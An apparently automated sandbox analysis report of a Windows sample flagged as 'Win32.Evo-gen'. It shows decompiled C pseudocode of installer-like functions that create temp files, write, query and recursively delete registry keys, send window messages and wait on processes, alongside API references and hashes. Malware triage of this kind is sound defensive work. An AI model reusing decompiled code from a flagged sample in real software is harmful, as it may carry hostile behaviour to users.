                                                    0x00402467
                                                    0x0040246b
                                                    0x00402477
                                                    0x00402477
                                                    0x00402488
                                                    0x00402490
                                                    0x00402492
                                                    0x00402492
                                                    0x00402495
                                                    0x0040256d
                                                    0x0040256d
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateValuelstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsg51C2.tmp
                                                    • API String ID: 1356686001-3554064489
                                                    • Opcode ID: 72eaf5712dff280b81f6b46b815c5678192136cf6c1ffe1af2a079e43c0fdf5d
                                                    • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                    • Opcode Fuzzy Hash: 72eaf5712dff280b81f6b46b815c5678192136cf6c1ffe1af2a079e43c0fdf5d
                                                    • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1432 405e16-405e22 1433 405e23-405e57 GetTickCount GetTempFileNameW 1432->1433 1434 405e66-405e68 1433->1434 1435 405e59-405e5b 1433->1435 1437 405e60-405e63 1434->1437 1435->1433 1436 405e5d 1435->1436 1436->1437
                                                    C-Code - Quality: 100%
                                                    			E00405E16(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a584; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                    0x00405e1c
                                                    0x00405e22
                                                    0x00405e23
                                                    0x00405e23
                                                    0x00405e28
                                                    0x00405e29
                                                    0x00405e2c
                                                    0x00405e31
                                                    0x00405e34
                                                    0x00405e3e
                                                    0x00405e4b
                                                    0x00405e4f
                                                    0x00405e57
                                                    0x00000000
                                                    0x00000000
                                                    0x00405e5b
                                                    0x00000000
                                                    0x00405e5d
                                                    0x00405e5d
                                                    0x00405e5d
                                                    0x00405e60
                                                    0x00405e63
                                                    0x00405e63
                                                    0x00405e66
                                                    0x00000000

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00405E34
                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                    Strings
                                                    • nsa, xrefs: 00405E23
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
                                                    • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", xrefs: 00405E16
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                    • API String ID: 1716503409-2709819214
                                                    • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                    • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                    • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                    • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1438 402c93-402cbc RegOpenKeyExW 1439 402d27-402d2b 1438->1439 1440 402cbe-402cc9 1438->1440 1441 402ce4-402cf4 RegEnumKeyW 1440->1441 1442 402cf6-402d08 RegCloseKey call 4065ec 1441->1442 1443 402ccb-402cce 1441->1443 1451 402d0a-402d19 1442->1451 1452 402d2e-402d34 1442->1452 1445 402cd0-402ce2 call 402c93 1443->1445 1446 402d1b-402d1e RegCloseKey 1443->1446 1445->1441 1445->1442 1448 402d24-402d26 1446->1448 1448->1439 1451->1439 1452->1448 1453 402d36-402d44 RegDeleteKeyW 1452->1453 1453->1448 1455 402d46 1453->1455 1455->1439
                                                    C-Code - Quality: 84%
                                                    			E00402C93(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402C93(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004065EC(3);
					if(_t27 == 0) {
						if( *0x42a2f0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
				}
				return _t18;
			}








                                                    0x00402cb4
                                                    0x00402cbc
                                                    0x00402ce4
                                                    0x00402cce
                                                    0x00402d1e
                                                    0x00402d24
                                                    0x00000000
                                                    0x00402d26
                                                    0x00402ce2
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ce2
                                                    0x00402cf9
                                                    0x00402d01
                                                    0x00402d08
                                                    0x00402d34
                                                    0x00000000
                                                    0x00000000
                                                    0x00402d3c
                                                    0x00402d44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402d44
                                                    0x00000000
                                                    0x00402d17
                                                    0x00402d2b

                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                    • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$DeleteEnumOpen
                                                    • String ID:
                                                    • API String ID: 1912718029-0
                                                    • Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                    • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                    • Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                    • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                    0x10001759
                                                    0x10001759
                                                    0x10001759
                                                    0x10001763
                                                    0x1000176b
                                                    0x10001778
                                                    0x10001786
                                                    0x10001789
                                                    0x1000178b
                                                    0x10001790
                                                    0x10001795
                                                    0x100018a8
                                                    0x100018a8
                                                    0x1000179b
                                                    0x1000179f
                                                    0x100017a2
                                                    0x100017a7
                                                    0x100017a8
                                                    0x100017a9
                                                    0x100017af
                                                    0x100017b5
                                                    0x100017e5
                                                    0x100017ec
                                                    0x10001810
                                                    0x1000184f
                                                    0x10001812
                                                    0x10001812
                                                    0x10001813
                                                    0x10001816
                                                    0x1000181c
                                                    0x10001820
                                                    0x10001823
                                                    0x10001828
                                                    0x10001828
                                                    0x1000182f
                                                    0x10001835
                                                    0x1000183b
                                                    0x10001847
                                                    0x10001848
                                                    0x1000184b
                                                    0x100017ee
                                                    0x100017ef
                                                    0x10001804
                                                    0x10001804
                                                    0x10001859
                                                    0x1000185c
                                                    0x10001869
                                                    0x10001870
                                                    0x10001878
                                                    0x1000187b
                                                    0x1000187b
                                                    0x10001878
                                                    0x10001888
                                                    0x10001890
                                                    0x10001895
                                                    0x10001888
                                                    0x1000189d
                                                    0x00000000
                                                    0x1000189f
                                                    0x00000000
                                                    0x100018a0
                                                    0x1000189d
                                                    0x100017b9
                                                    0x100017bc
                                                    0x100017da
                                                    0x00000000
                                                    0x00000000
                                                    0x100017dd
                                                    0x100017e2
                                                    0x100017e2
                                                    0x100017e4
                                                    0x00000000
                                                    0x100017e4
                                                    0x100017be
                                                    0x100017bf
                                                    0x100017c7
                                                    0x100017c8
                                                    0x00000000
                                                    0x100017c8
                                                    0x100017c1
                                                    0x100017c2
                                                    0x100017d0
                                                    0x00000000
                                                    0x100017d0
                                                    0x100017c5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x100017c5

                                                    APIs
                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                    • String ID:
                                                    • API String ID: 1791698881-3916222277
                                                    • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                    • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C31(3);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C31(4);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C53(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C53(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C53();
					_t32 = E00402C53();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C31();
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t41 = E00402C31(2);
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406159();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                    0x00401c19
                                                    0x00401c1b
                                                    0x00401c22
                                                    0x00401c25
                                                    0x00401c28
                                                    0x00401c32
                                                    0x00401c36
                                                    0x00401c39
                                                    0x00401c42
                                                    0x00401c42
                                                    0x00401c45
                                                    0x00401c49
                                                    0x00401c52
                                                    0x00401c52
                                                    0x00401c55
                                                    0x00401c59
                                                    0x00401c5b
                                                    0x00401cb0
                                                    0x00401cb2
                                                    0x00401cbd
                                                    0x00401cc7
                                                    0x00401cca
                                                    0x00401cca
                                                    0x00401cd3
                                                    0x00000000
                                                    0x00401c5d
                                                    0x00401c64
                                                    0x00401c66
                                                    0x00401c69
                                                    0x00401c6f
                                                    0x00401c76
                                                    0x00401c79
                                                    0x00401ca1
                                                    0x00401cd9
                                                    0x00401cd9
                                                    0x00401c7b
                                                    0x00401c89
                                                    0x00401c91
                                                    0x00401c94
                                                    0x00401c94
                                                    0x00401c79
                                                    0x00401cdc
                                                    0x00401cdf
                                                    0x00401ce5
                                                    0x00402a81
                                                    0x00402a81
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                    • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                    • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                    • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004060DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E004060DF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}






                                                    0x004060ef
                                                    0x004060f1
                                                    0x004060fe
                                                    0x00406109
                                                    0x00406111
                                                    0x00406116
                                                    0x0040612a
                                                    0x00406132
                                                    0x00406140
                                                    0x00406140
                                                    0x00406146
                                                    0x00000000
                                                    0x0040614d
                                                    0x00406156

                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406109
                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612A
                                                    • RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Call
                                                    • API String ID: 3677997916-1824292864
                                                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                    • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                    • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E00401ED5() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402C53(_t25);
				E00405371(0xffffffeb, _t14);
				_t16 = E004058F2(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x20)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406628(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 0x38);
						if( *((intOrPtr*)(_t32 - 0x24)) < _t25) {
							if( *(_t32 - 0x38) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00406159( *((intOrPtr*)(_t32 - 0xc)),  *(_t32 - 0x38));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}







                                                    0x00401edb
                                                    0x00401ee0
                                                    0x00401ee6
                                                    0x00401eed
                                                    0x00401ef0
                                                    0x004028a1
                                                    0x00401ef6
                                                    0x00401ef9
                                                    0x00401f04
                                                    0x00401f1b
                                                    0x00401f0f
                                                    0x00401f19
                                                    0x00401f19
